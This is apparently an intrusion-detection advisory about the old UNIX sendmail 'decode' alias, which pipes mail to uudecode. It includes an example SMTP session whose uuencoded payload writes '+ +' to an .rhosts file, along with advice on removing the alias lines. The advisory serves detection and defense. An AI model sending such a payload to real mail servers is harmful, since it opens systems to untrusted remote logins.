SMTP mail to decode alias
advICE :Intrusions : 2001013

Summary

An e-mail message has been seen addressed to the user named decode. This might be an attempt to break into the e-mail server, or it might be part of a scan against the system.

Details

This is a fairly old issue originally discovered in 1990. UNIX systems would allow e-mail sent to the username decode to be passed not to a user, but to the program uudecode. The intruder could cause files to be overwritten in this manner in order to break into the system.

This bug comes from the default /etc/aliases file containing a line that looks like:

decode: |/usr/bin/uudecode

These days, this intrusion will likely only be triggered by broad-spectrum vulnerability scanners as they examine your system.

Example Exploit

The intruder will attempt to e-mail a uuencoded file after the DATA command.

HELO                                    
MAIL FROM: test@example.com
RCPT TO: decode                         
DATA
begin 644 /usr/bin/.rhosts
$*R`K"@``
`                                       
end
.
QUIT

This example will exploit the system by writing the line "+ +" to the file ".rhosts". This will tell the system to trust anybody who logs in via such programs as 'rlogin'.

Systems

This alert is only important for sendmail servers running on UNIX.

Defense

Look in the e-mail "aliases" file located in /etc/aliases. Look for lines that look like:

    decode: |/usr/bin/uudecode 
	uudecode: |/usr/bin/uuencode -d

Remove these lines.

Note that newer systems do not have this enabled.

parametric information protocol The protocol in which this recipient was seen. recipient The email recipient's name.

 
Version appeared: